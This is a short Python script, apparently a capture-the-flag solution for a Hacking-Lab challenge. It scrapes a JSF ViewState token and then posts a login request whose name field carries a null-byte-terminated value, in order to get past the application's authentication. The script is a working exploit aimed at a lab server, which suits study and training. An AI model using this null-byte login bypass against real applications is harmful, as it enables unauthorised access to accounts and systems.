35 lines
864 B
Python
35 lines
864 B
Python
|
#!/usr/bin/python
|
||
|
|
||
|
import requests
|
||
|
from bs4 import BeautifulSoup as bs
|
||
|
|
||
|
URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
|
||
|
|
||
|
session = requests.session()
|
||
|
|
||
|
# Get view state
|
||
|
response = session.get(URL)
|
||
|
if response.status_code != 200:
|
||
|
print("Server returned %d %s" % (response.status_code, response.reason))
|
||
|
exit(1)
|
||
|
|
||
|
html = bs(response.text, 'lxml')
|
||
|
viewState = html.find("input", { "id": "javax.faces.ViewState" })
|
||
|
if viewState is None:
|
||
|
print("Could not find javax.faces.ViewState")
|
||
|
exit(2)
|
||
|
|
||
|
params = {
|
||
|
"j_idt14": "j_idt14",
|
||
|
"j_idt14:j_idt15": "login",
|
||
|
"j_idt14:name": "auth_token_4835989\0",
|
||
|
"javax.faces.ViewState": viewState['value']
|
||
|
}
|
||
|
|
||
|
response = session.post(URL, data=params)
|
||
|
if response.status_code != 200:
|
||
|
print("Server returned %d %s" % (response.status_code, response.reason))
|
||
|
exit(1)
|
||
|
|
||
|
print(response.text)
|